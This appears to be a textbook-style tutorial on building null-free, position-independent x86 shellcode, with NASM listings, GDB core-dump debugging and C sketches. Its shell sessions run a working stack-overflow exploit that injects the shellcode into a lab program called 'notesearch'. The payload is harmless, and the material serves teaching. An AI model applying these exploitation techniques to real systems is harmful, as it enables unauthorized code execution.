The Path to Shellcode

8/31/2010 3:53:11 PM

Shellcode is literally injected into a running program, where it takes over like a biological virus inside a cell. Since shellcode isn't really an executable program, we don't have the luxury of declaring the layout of data in memory or even using other memory segments. Our instructions must be self-contained and ready to take over control of the processor regardless of its current state. This is commonly referred to as position-independent code.

In shellcode, the bytes for the string "Hello, world!" must be mixed together with the bytes for the assembly instructions, since there aren't definable or predictable memory segments. This is fine as long as EIP doesn't try to interpret the string as instructions. However, to access the string as data we need a pointer to it. When the shellcode gets executed, it could be anywhere in memory, so the string's absolute memory address needs to be calculated relative to EIP. Since 32-bit x86 has no instruction that reads EIP directly, however, we need to use some sort of trick.

1. Assembly Instructions Using the Stack

The stack is so integral to the x86 architecture that there are special instructions for its operations.

Instruction	Description
`push`	Push the source operand to the stack.
`pop`	Pop a value from the stack and store in the destination operand.
`call`	Call a function, jumping the execution to the address in the location operand. This location can be relative or absolute. The address of the instruction following the call is pushed to the stack, so that execution can return later.
`ret`	Return from a function, popping the return address from the stack and jumping execution there.

Stack-based exploits are made possible by the call and ret instructions. When a function is called, the address of the next instruction (the return address) is pushed to the stack, beginning the stack frame. After the function is finished, the ret instruction pops the return address from the stack and jumps EIP back there. By overwriting the stored return address on the stack before the ret instruction executes, we can take control of a program's execution.

This architecture can be misused in another way to solve the problem of addressing the inline string data. If the string is placed directly after a call instruction, the address of the string will get pushed to the stack as the return address. Instead of calling a function, we can jump past the string to a pop instruction that will take the address off the stack and put it into a register. The following assembly instructions demonstrate this technique.

1.1. helloworld1.s

BITS 32             ; Tell nasm this is 32-bit code.

  call mark_below   ; Call below the string to instructions
  db "Hello, world!", 0x0a, 0x0d  ; with newline and carriage return bytes.

mark_below:
; ssize_t write(int fd, const void *buf, size_t count);
  pop ecx           ; Pop the return address (string ptr) into ecx.
  mov eax, 4        ; Write syscall #.
  mov ebx, 1        ; STDOUT file descriptor
  mov edx, 15       ; Length of the string (13 chars + 0x0a + 0x0d)
  int 0x80          ; Do syscall: write(1, string, 15)

; void _exit(int status);
  mov eax, 1        ; Exit syscall #
  mov ebx, 0        ; Status = 0
  int 0x80          ; Do syscall: exit(0)

The call instruction jumps execution down below the string. It also pushes the address of the next instruction to the stack, and in our case that next "instruction" is the beginning of the string. The return address can immediately be popped from the stack into the appropriate register. Without using any memory segments, these raw instructions, injected into an existing process, will execute in a completely position-independent way. This also means that, when these instructions are assembled, they aren't linked into an executable: nasm's default flat-binary output is just the raw machine code bytes.
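The address arithmetic behind the call/pop trick can be modeled in a few lines of C. This is a minimal sketch, not part of the book's toolchain. The helper names pushed_return_address() and call_target() are hypothetical. The constants come from the assembled helloworld1, whose first instruction is E8 0F 00 00 00, a 5-byte call with displacement 0x0f. Whatever base address the shellcode lands at, the pushed value is the start of the string and the jump lands on the pop ecx.

```c
#include <assert.h>
#include <stdint.h>

#define CALL_LEN   5u     /* opcode E8 plus a 4-byte displacement */
#define CALL_REL32 0x0fu  /* displacement bytes 0f 00 00 00 in helloworld1 */

/* Hypothetical helper: the value `call mark_below` pushes, i.e. the address
 * of the byte right after the call, which is where "Hello, world!" starts. */
uint32_t pushed_return_address(uint32_t base) {
    return base + CALL_LEN;
}

/* Hypothetical helper: where execution continues (the pop ecx at
 * mark_below). The displacement is relative to the end of the call. */
uint32_t call_target(uint32_t base) {
    return base + CALL_LEN + CALL_REL32;
}
```

Both results are just the base plus a constant, which is what makes the code position-independent. With the shellcode at 0xbffff9c6, for example, the string pointer popped into ecx would be 0xbffff9cb, and execution would continue at 0xbffff9da.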

reader@hacking:~/booksrc $ nasm helloworld1.s
reader@hacking:~/booksrc $ ls -l helloworld1
-rw-r--r-- 1 reader reader 50 2007-10-26 08:30 helloworld1
reader@hacking:~/booksrc $ hexdump -C helloworld1
00000000  e8 0f 00 00 00 48 65 6c  6c 6f 2c 20 77 6f 72 6c  |.....Hello, worl|
00000010  64 21 0a 0d 59 b8 04 00  00 00 bb 01 00 00 00 ba  |d!..Y...........|
00000020  0f 00 00 00 cd 80 b8 01  00 00 00 bb 00 00 00 00  |................|
00000030  cd 80                                             |..|
00000032
reader@hacking:~/booksrc $ ndisasm -b32 helloworld1
00000000  E80F000000        call 0x14
00000005  48                dec eax
00000006  656C              gs insb
00000008  6C                insb
00000009  6F                outsd
0000000A  2C20              sub al,0x20
0000000C  776F              ja 0x7d
0000000E  726C              jc 0x7c
00000010  64210A            and [fs:edx],ecx
00000013  0D59B80400        or eax,0x4b859
00000018  0000              add [eax],al
0000001A  BB01000000        mov ebx,0x1
0000001F  BA0F000000        mov edx,0xf
00000024  CD80              int 0x80
00000026  B801000000        mov eax,0x1
0000002B  BB00000000        mov ebx,0x0
00000030  CD80              int 0x80
reader@hacking:~/booksrc $

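The nasm assembler converts assembly language into machine code, and a corresponding tool called ndisasm converts machine code into assembly. These tools are used above to show the relationship between the machine code bytes and the assembly instructions. In the disassembly, the instructions from offset 0x05 through 0x10 are the bytes of the "Hello, world!" string interpreted as instructions. Because ndisasm doesn't know where the data ends, the string's final 0x0d byte at offset 0x13 is also merged with the bytes of pop ecx and mov eax that follow. As a result, those two instructions are decoded incorrectly until the disassembly resynchronizes at offset 0x1A.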

Now, if we can inject this shellcode into a program and redirect EIP, the program will print out Hello, world! Let's use the familiar exploit target of the notesearch program.

reader@hacking:~/booksrc $ export SHELLCODE=$(cat helloworld1)
reader@hacking:~/booksrc $ ./getenvaddr SHELLCODE ./notesearch
SHELLCODE will be at 0xbffff9c6
reader@hacking:~/booksrc $ ./notesearch $(perl -e 'print "\xc6\xf9\xff\xbf"x40')
-------[ end of note data ]-------
Segmentation fault
reader@hacking:~/booksrc $

Failure. Why do you think it crashed? In situations like this, GDB is your best friend. Even if you already know the reason behind this specific crash, learning how to effectively use a debugger will help you solve many other problems in the future.

2. Investigating with GDB

Since the notesearch program runs as root, we can't debug it as a normal user. We also can't simply attach to a running copy of it, because it exits too quickly. Another way to debug programs is with core dumps. From a root prompt, the OS can be told to dump memory when the program crashes by using the command ulimit -c unlimited, which allows dumped core files to grow as large as needed. Now, when the program crashes, its memory will be dumped to disk as a core file, which can be examined using GDB.
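The ulimit -c step can also be done from inside a C program with the POSIX getrlimit() and setrlimit() calls on RLIMIT_CORE. This is a sketch that assumes a Linux-like system, and the helper name allow_core_dumps() is hypothetical. It only raises the soft limit up to the existing hard limit, which any unprivileged process may do. When bash runs ulimit -c unlimited without -H or -S, it sets both the soft and hard limits, and raising the hard limit requires root.

```c
#include <assert.h>
#include <stdio.h>
#include <sys/resource.h>

/* Hypothetical helper: let this process (and children it starts later)
 * write core files as large as the hard limit permits. */
int allow_core_dumps(void) {
    struct rlimit rl;

    if (getrlimit(RLIMIT_CORE, &rl) != 0) {
        perror("getrlimit");
        return -1;
    }
    rl.rlim_cur = rl.rlim_max;   /* soft limit := hard limit */
    if (setrlimit(RLIMIT_CORE, &rl) != 0) {
        perror("setrlimit");
        return -1;
    }
    return 0;
}
```

Resource limits are inherited across fork() and exec(), so a wrapper that calls this function and then runs the target program gets the same effect for that program as the shell command does.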

reader@hacking:~/booksrc $ sudo su
root@hacking:/home/reader/booksrc # ulimit -c unlimited
root@hacking:/home/reader/booksrc # export SHELLCODE=$(cat helloworld1)
root@hacking:/home/reader/booksrc # ./getenvaddr SHELLCODE ./notesearch
SHELLCODE will be at 0xbffff9a3
root@hacking:/home/reader/booksrc # ./notesearch $(perl -e 'print "\xa3\xf9\xff\xbf"x40')
-------[ end of note data ]-------
Segmentation fault (core dumped)
root@hacking:/home/reader/booksrc # ls -l ./core
-rw------- 1 root root 147456 2007-10-26 08:36 ./core
root@hacking:/home/reader/booksrc # gdb -q -c ./core
(no debugging symbols found)
Using host libthread_db library "/lib/tls/i686/cmov/libthread_db.so.1".
Core was generated by './notesearch
£°E¿£°E¿£°E¿£°E¿£°E¿£°E¿£°E¿£°E¿£°E¿£°E¿£°E¿£°E¿£°E¿£°E¿£°E¿£°E¿£°E.
Program terminated with signal 11, Segmentation fault.
#0  0x2c6541b7 in ?? ()
(gdb) set dis intel
(gdb) x/5i 0xbffff9a3
0xbffff9a3:     call   0x2c6541b7
0xbffff9a8:     ins    BYTE PTR es:[edi],[dx]
0xbffff9a9:     outs   [dx],DWORD PTR ds:[esi]
0xbffff9aa:     sub    al,0x20
0xbffff9ac:     ja     0xbffffa1d
(gdb) i r eip
eip            0x2c6541b7        0x2c6541b7
(gdb) x/32xb 0xbffff9a3
0xbffff9a3:     0xe8    0x0f    0x48    0x65    0x6c    0x6c    0x6f    0x2c
0xbffff9ab:     0x20    0x77    0x6f    0x72    0x6c    0x64    0x21    0x0a
0xbffff9b3:     0x0d    0x59    0xb8    0x04    0xbb    0x01    0xba    0x0f
0xbffff9bb:     0xcd    0x80    0xb8    0x01    0xbb    0xcd    0x80    0x00
(gdb) quit
root@hacking:/home/reader/booksrc # hexdump -C helloworld1
00000000  e8 0f 00 00 00 48 65 6c  6c 6f 2c 20 77 6f 72 6c  |.....Hello, worl|
00000010  64 21 0a 0d 59 b8 04 00  00 00 bb 01 00 00 00 ba  |d!..Y...........|
00000020  0f 00 00 00 cd 80 b8 01  00 00 00 bb 00 00 00 00  |................|
00000030  cd 80                                             |..|
00000032
root@hacking:/home/reader/booksrc #

Once GDB is loaded, the disassembly style is switched to Intel. Since we are running GDB as root, the .gdbinit file won't be used. Then the memory where the shellcode should be is examined. The instructions look incorrect, and it seems that the first, incorrect call instruction is what caused the crash: EIP ended up at 0x2c6541b7, the bogus call target. So execution was redirected, but something went wrong with the shellcode bytes. Comparing the x/32xb output with the hexdump of helloworld1 shows the problem: every 0x00 byte of the shellcode is missing. Normally, strings are terminated by a null byte, and here the shell was kind enough to remove these null bytes for us. This, however, totally destroys the meaning of the machine code. Often, shellcode will be injected into a process as a string, using functions like strcpy(). Such functions will simply terminate at the first null byte, producing incomplete and unusable shellcode in memory. In order for the shellcode to survive transit, it must be redesigned so it doesn't contain any null bytes.
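The strcpy() failure mode can be reproduced with ordinary C string functions. The sketch below embeds the first 20 bytes of helloworld1, transcribed from the hexdump above. It measures how much of them would survive a string copy. The function name bytes_surviving_strcpy() is hypothetical.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

/* First 20 bytes of helloworld1: the call instruction, then the string. */
const unsigned char helloworld1_head[] = {
    0xe8, 0x0f, 0x00, 0x00, 0x00,              /* call mark_below */
    'H', 'e', 'l', 'l', 'o', ',', ' ',
    'w', 'o', 'r', 'l', 'd', '!', 0x0a, 0x0d   /* "Hello, world!\n\r" */
};

/* Number of leading bytes a strcpy()-style copy would keep: everything
 * before the first null byte, or the whole buffer if there is none. */
size_t bytes_surviving_strcpy(const unsigned char *buf, size_t len) {
    const unsigned char *nul = memchr(buf, 0x00, len);
    return nul != NULL ? (size_t)(nul - buf) : len;
}
```

A strcpy() of these bytes would stop after e8 0f, leaving only the first two bytes of the call instruction and none of the string.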

3. Removing Null Bytes

Looking at the disassembly, it is obvious that the first null bytes come from the call instruction.

reader@hacking:~/booksrc $ ndisasm -b32 helloworld1
00000000  E80F000000        call 0x14
00000005  48                dec eax
00000006  656C              gs insb
00000008  6C                insb
00000009  6F                outsd
0000000A  2C20              sub al,0x20
0000000C  776F              ja 0x7d
0000000E  726C              jc 0x7c
00000010  64210A            and [fs:edx],ecx
00000013  0D59B80400        or eax,0x4b859
00000018  0000              add [eax],al
0000001A  BB01000000        mov ebx,0x1
0000001F  BA0F000000        mov edx,0xf
00000024  CD80              int 0x80
00000026  B801000000        mov eax,0x1
0000002B  BB00000000        mov ebx,0x0
00000030  CD80              int 0x80
reader@hacking:~/booksrc $

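This instruction jumps execution forward by 15 (0x0f) bytes, measured from the end of the 5-byte call instruction, so it lands at offset 0x14. The call instruction's operand is a full 32-bit displacement to allow much longer jump distances. As a result, a small value like 15 has to be padded with leading zeros. Stored in little-endian order, those zeros become the null bytes in 0f 00 00 00.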
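To see where the zeros come from, here is a small C sketch that encodes a call with a 32-bit relative displacement and counts the null bytes in the result. The function names are hypothetical. The encoding follows the x86 rule used above: opcode E8, then a little-endian displacement measured from the end of the 5-byte instruction.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Encode `call target` as it would appear at offset `at` in a flat binary. */
void encode_call_rel32(uint32_t at, uint32_t target, unsigned char out[5]) {
    uint32_t rel = target - (at + 5u);   /* unsigned wraparound = two's complement */
    out[0] = 0xe8;                       /* call rel32 opcode */
    for (int i = 0; i < 4; i++)          /* little-endian displacement */
        out[1 + i] = (unsigned char)(rel >> (8 * i));
}

int count_null_bytes(const unsigned char *buf, size_t len) {
    int n = 0;
    for (size_t i = 0; i < len; i++)
        if (buf[i] == 0x00)
            n++;
    return n;
}
```

Encoding helloworld1's call (at offset 0x00, target 0x14) yields e8 0f 00 00 00, so three of the five bytes are null.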

One way around this problem takes advantage of two's complement. A small negative number will have its leading bits turned on, resulting in 0xff bytes. This means that, if we call using a negative value to move backward in execution, the machine code for that instruction won't have any null bytes. The following revision of the helloworld shellcode uses a standard implementation of this trick: jump to the end of the shellcode to a call instruction which, in turn, will jump back to a pop instruction at the beginning of the shellcode.
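The two's complement argument can be checked exhaustively for short backward calls. The sketch below uses hypothetical function names. It looks at the 4-byte operand of a call for every displacement from -1 down to -255. The three high bytes are 0xff and the low byte is nonzero, so none of them contains a null byte. At -256 the low byte becomes 0x00 and the trick stops working. For the backward call in helloworld2, which goes from offset 0x20 back to 0x02, the displacement is 0x02 - 0x25 = -0x23. Its bit pattern is 0xffffffdd, stored as dd ff ff ff.

```c
#include <assert.h>
#include <stdint.h>

/* Does the little-endian rel32 operand for this displacement contain 0x00? */
int rel32_has_null_byte(int32_t rel) {
    uint32_t u = (uint32_t)rel;              /* two's complement bit pattern */
    for (int i = 0; i < 4; i++)
        if (((u >> (8 * i)) & 0xffu) == 0)
            return 1;
    return 0;
}

/* Every backward displacement from -1 to -255 encodes as xx ff ff ff
 * with a nonzero low byte, so none of them contains a null byte. */
int small_backward_calls_are_null_free(void) {
    for (int32_t rel = -1; rel >= -255; rel--)
        if (rel32_has_null_byte(rel))
            return 0;
    return 1;
}
```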

3.1. helloworld2.s

BITS 32             ; Tell nasm this is 32-bit code.

jmp short one       ; Jump down to a call at the end.

two:
; ssize_t write(int fd, const void *buf, size_t count);
  pop ecx           ; Pop the return address (string ptr) into ecx.
  mov eax, 4        ; Write syscall #.
  mov ebx, 1        ; STDOUT file descriptor
  mov edx, 15       ; Length of the string
  int 0x80          ; Do syscall: write(1, string, 15)

; void _exit(int status);
  mov eax, 1        ; Exit syscall #
  mov ebx, 0        ; Status = 0
  int 0x80          ; Do syscall: exit(0)

one:
  call two   ; Call back upwards to avoid null bytes
  db "Hello, world!", 0x0a, 0x0d ; with newline and carriage return bytes.

After assembling this new shellcode, disassembly shows that the call instruction at offset 0x20 (E8DDFFFFFF) is now free of null bytes. This solves the first and most difficult null-byte problem for this shellcode, but there are still many other null bytes, all in the immediate operands of the mov instructions.

reader@hacking:~/booksrc $ nasm helloworld2.s
reader@hacking:~/booksrc $ ndisasm -b32 helloworld2
00000000  EB1E              jmp short 0x20
00000002  59                pop ecx
00000003  B804000000        mov eax,0x4
00000008  BB01000000        mov ebx,0x1
0000000D  BA0F000000        mov edx,0xf
00000012  CD80              int 0x80
00000014  B801000000        mov eax,0x1
00000019  BB00000000        mov ebx,0x0
0000001E  CD80              int 0x80
00000020  E8DDFFFFFF        call 0x2
00000025  48                dec eax
00000026  656C              gs insb
00000028  6C                insb
00000029  6F                outsd
0000002A  2C20              sub al,0x20
0000002C  776F              ja 0x9d
0000002E  726C              jc 0x9c
00000030  64210A            and [fs:edx],ecx
00000033  0D                db 0x0D
reader@hacking:~/booksrc $

These remaining null bytes can be eliminated with an understanding of register widths and addressing. Notice that the first jmp instruction is actually jmp short. Its operand is a single signed byte, so execution can only jump from 128 bytes backward to 127 bytes forward, measured from the end of the instruction. The normal jmp instruction, as well as the call instruction (which has no short version), uses a 32-bit displacement and allows for much longer jumps. The difference between the assembled machine code for the two jump varieties is shown below:

	EB 1E              jmp short 0x20

versus

	E9 1E 00 00 00     jmp 0x23
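The range limit of jmp short follows directly from its encoding. Here is a C sketch with a hypothetical function name. It encodes `jmp short target` at a given offset and refuses targets that don't fit in a signed byte.

```c
#include <assert.h>
#include <stdint.h>

/* Encode `jmp short target` at offset `at`: opcode EB followed by a signed
 * 8-bit displacement measured from the end of the 2-byte instruction.
 * Returns 1 on success, 0 if the target is out of the -128..+127 range. */
int encode_jmp_short(int32_t at, int32_t target, unsigned char out[2]) {
    int32_t rel = target - (at + 2);
    if (rel < -128 || rel > 127)
        return 0;
    out[0] = 0xeb;
    out[1] = (unsigned char)rel;   /* conversion keeps the low 8 bits */
    return 1;
}
```

Encoding the helloworld2 jump (offset 0x00, target 0x20) gives EB 1E, matching the disassembly. A backward jump from 0x20 to 0x02 would encode as EB E0.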

The EAX, EBX, ECX, EDX, ESI, EDI, EBP, and ESP registers are 32 bits in width. The E stands for extended, because these were originally 16-bit registers called AX, BX, CX, DX, SI, DI, BP, and SP. These original 16-bit versions of the registers can still be used for accessing the lower 16 bits of each corresponding 32-bit register. Furthermore, the individual bytes of the AX, BX, CX, and DX registers can be accessed as 8-bit registers called AL, AH, BL, BH, CL, CH, DL, and DH, where L stands for low byte and H for high byte. Naturally, assembly instructions using the smaller registers only need to specify operands up to the register's bit width. The three variations of a mov instruction are shown below.

Machine code	Assembly
`B8 04 00 00 00`	`mov eax,0x4`
`66 B8 04 00`	`mov ax,0x4`
`B0 04`	`mov al,0x4`
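As a rough model of these register views, each smaller register can be treated as a slice of the low bits of EAX. This C sketch is not how the CPU implements them, and the reg_ax(), reg_ah(), and reg_al() names are made up for illustration.

```c
#include <assert.h>
#include <stdint.h>

uint16_t reg_ax(uint32_t eax) { return (uint16_t)(eax & 0xffffu); }        /* bits 0-15 */
uint8_t  reg_ah(uint32_t eax) { return (uint8_t)((eax >> 8) & 0xffu); }    /* bits 8-15 */
uint8_t  reg_al(uint32_t eax) { return (uint8_t)(eax & 0xffu); }           /* bits 0-7  */
```

For EAX = 0x11223344, AX is 0x3344, AH is 0x33, and AL is 0x44.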

Using the AL, BL, CL, or DL register will put the correct least significant byte into the corresponding extended register without creating any null bytes in the machine code. However, the top three bytes of the register could still contain anything. This is especially true for shellcode, since it will be taking over another process. If we want the full 32-bit register values to be correct, we need to zero out the entire register before the mov instructions, but this, again, must be done without using null bytes. Here are some more simple assembly instructions for your arsenal. These first two are small instructions that increment and decrement their operand by one.
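The leftover-bytes problem is easy to model. In this C sketch, the hypothetical mov_al() replaces only bits 0 through 7 of a 32-bit value, the way `mov al, imm8` does. The hypothetical zero_then_mov_al() clears the whole register first.

```c
#include <assert.h>
#include <stdint.h>

/* `mov al, imm8`: bits 8-31 keep whatever the hijacked process left there. */
uint32_t mov_al(uint32_t eax, uint8_t imm) {
    return (eax & 0xffffff00u) | imm;
}

/* Zero the full register first, then set the low byte. */
uint32_t zero_then_mov_al(uint32_t eax, uint8_t imm) {
    eax = 0;                       /* stands in for a null-free zeroing instruction */
    return mov_al(eax, imm);
}
```

Starting from a leftover value of 0xdeadbeef, mov_al(eax, 4) produces 0xdeadbe04 rather than the syscall number 4, while zero_then_mov_al() produces exactly 4.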

Instruction	Description
`inc`	Increment the target operand by adding 1 to it.
`dec`	Decrement the target operand by subtracting 1 from it.

The next few instructions, like the mov instruction, have two operands. They all do simple arithmetic and bitwise logical operations between the two operands, storing the result in the first operand.

Instruction	Description
`add <dest>, <source>`	Add the source operand to the destination operand, storing the result in the destination.
`sub <dest>, <source>`	Subtract the source operand from the destination operand, storing the result in the destination.
`or <dest>, <source>`	Perform a bitwise `or` logic operation, comparing each bit of one operand with the corresponding bit of the other operand: 1 or 0 = 1; 1 or 1 = 1; 0 or 1 = 1; 0 or 0 = 0. If the source bit or the destination bit is on, or if both of them are on, the result bit is on; otherwise, the result is off. The final result is stored in the destination operand.
`and <dest>, <source>`	Perform a bitwise `and` logic operation, comparing each bit of one operand with the corresponding bit of the other operand: 1 and 0 = 0; 1 and 1 = 1; 0 and 1 = 0; 0 and 0 = 0. The result bit is on only if both the source bit and the destination bit are on. The final result is stored in the destination operand.
`xor <dest>, <source>`	Perform a bitwise exclusive or (`xor`) logic operation, comparing each bit of one operand with the corresponding bit of the other operand: 1 xor 0 = 1; 1 xor 1 = 0; 0 xor 1 = 1; 0 xor 0 = 0. If the bits differ, the result bit is on; if the bits are the same, the result bit is off. The final result is stored in the destination operand.

One way to zero a register is to move an arbitrary 32-bit number into the register and then subtract that value from the register using the mov and sub instructions:

	B8 44 33 22 11        mov eax,0x11223344
	2D 44 33 22 11        sub eax,0x11223344

While this technique works, it takes 10 bytes to zero out a single register, making the assembled shellcode larger than necessary. Can you think of a way to optimize this technique? The DWORD value specified in each instruction comprises 80 percent of the code. Subtracting any value from itself also produces 0 and doesn't require any static data. This can be done with a single two-byte instruction:

	29 C0               sub eax,eax

Using the sub instruction will work fine when zeroing registers at the beginning of shellcode. Keep in mind that this instruction modifies the processor flags used for branching, so it shouldn't be placed between a comparison and the conditional jump that depends on it. In practice, most shellcode zeroes registers with a different two-byte instruction: xor. The xor instruction performs an exclusive or operation on the bits in a register. Since 1 xored with 1 results in 0, and 0 xored with 0 results in 0, any value xored with itself will result in 0. This is the same result as with any value subtracted from itself. Note that xor also modifies the processor flags: it clears CF and OF and sets ZF, SF, and PF from the result. The preference for xor is therefore a matter of convention rather than flag safety.

	31 C0                 xor eax,eax
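A quick C check of the arithmetic behind both idioms follows. It is a sketch with illustrative names. Subtracting or xoring any 32-bit value with itself gives 0, and the constants tally the byte counts of the three zeroing encodings shown above. C's operators don't model the processor flags, so this says nothing about the flag behavior.

```c
#include <assert.h>
#include <stdint.h>

uint32_t sub_self(uint32_t x) { return x - x; }   /* like sub eax,eax */
uint32_t xor_self(uint32_t x) { return x ^ x; }   /* like xor eax,eax */

/* Encoded sizes of each zeroing approach. */
enum {
    MOV_SUB_BYTES  = 5 + 5,  /* B8 44 33 22 11 ; 2D 44 33 22 11 */
    SUB_SELF_BYTES = 2,      /* 29 C0 */
    XOR_SELF_BYTES = 2       /* 31 C0 */
};
```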

You can safely use the sub instruction to zero registers (if done at the beginning of the shellcode), but the xor instruction is most commonly used in shellcode in the wild. This next revision of the shellcode makes use of the smaller registers and the xor instruction to avoid null bytes. The inc and dec instructions have also been used when possible to make for even smaller shellcode.

3.2. helloworld3.s

BITS 32             ; Tell nasm this is 32-bit code.

jmp short one       ; Jump down to a call at the end.

two:
; ssize_t write(int fd, const void *buf, size_t count);
  pop ecx           ; Pop the return address (string ptr) into ecx.
  xor eax, eax      ; Zero out full 32 bits of eax register.
  mov al, 4         ; Write syscall #4 to the low byte of eax.
  xor ebx, ebx      ; Zero out ebx.
  inc ebx           ; Increment ebx to 1, STDOUT file descriptor.
  xor edx, edx      ; Zero out edx.
  mov dl, 15        ; Length of the string
  int 0x80          ; Do syscall: write(1, string, 15)

; void _exit(int status);
  mov al, 1        ; Exit syscall #1; the top 3 bytes are still zero (write() returned 15).
  dec ebx          ; Decrement ebx back down to 0 for status = 0.
  int 0x80         ; Do syscall: exit(0)

one:
  call two   ; Call back upwards to avoid null bytes
  db "Hello, world!", 0x0a, 0x0d  ; with newline and carriage return bytes.

After assembling this shellcode, hexdump and grep are used to quickly check it for null bytes.

reader@hacking:~/booksrc $ nasm helloworld3.s
reader@hacking:~/booksrc $ hexdump -C helloworld3 | grep --color=auto 00
00000000  eb 13 59 31 c0 b0 04 31  db 43 31 d2 b2 0f cd 80  |..Y1...1.C1.....|
00000010  b0 01 4b cd 80 e8 e8 ff  ff ff 48 65 6c 6c 6f 2c  |..K.......Hello,|
00000020  20 77 6f 72 6c 64 21 0a  0d                       | world!..|
00000029
reader@hacking:~/booksrc $
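The same check can be done without relying on grep, which also matches the 00 digits in hexdump's offset column. The sketch below embeds the helloworld3 bytes transcribed from the hexdump above and reports any null bytes it finds. The function name report_null_bytes() is hypothetical. For helloworld3 it finds none.

```c
#include <assert.h>
#include <stddef.h>
#include <stdio.h>

/* helloworld3 as shown by the hexdump above (41 bytes). */
const unsigned char helloworld3[] = {
    0xeb, 0x13, 0x59, 0x31, 0xc0, 0xb0, 0x04, 0x31,
    0xdb, 0x43, 0x31, 0xd2, 0xb2, 0x0f, 0xcd, 0x80,
    0xb0, 0x01, 0x4b, 0xcd, 0x80, 0xe8, 0xe8, 0xff,
    0xff, 0xff, 0x48, 0x65, 0x6c, 0x6c, 0x6f, 0x2c,
    0x20, 0x77, 0x6f, 0x72, 0x6c, 0x64, 0x21, 0x0a,
    0x0d
};

/* Print the offset of every null byte and return how many were found. */
size_t report_null_bytes(const unsigned char *buf, size_t len) {
    size_t found = 0;
    for (size_t i = 0; i < len; i++) {
        if (buf[i] == 0x00) {
            printf("null byte at offset 0x%02zx\n", i);
            found++;
        }
    }
    return found;
}
```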

Now this shellcode is usable, as it doesn't contain any null bytes. When used with an exploit, the notesearch program is coerced into greeting the world like a newbie.

reader@hacking:~/booksrc $ export SHELLCODE=$(cat helloworld3)
reader@hacking:~/booksrc $ ./getenvaddr SHELLCODE ./notesearch
SHELLCODE will be at 0xbffff9bc
reader@hacking:~/booksrc $ ./notesearch $(perl -e 'print "\xbc\xf9\xff\xbf"x40')
[DEBUG] found a 33 byte note for user id 999
-------[ end of note data ]-------
Hello, world!
reader@hacking:~/booksrc $
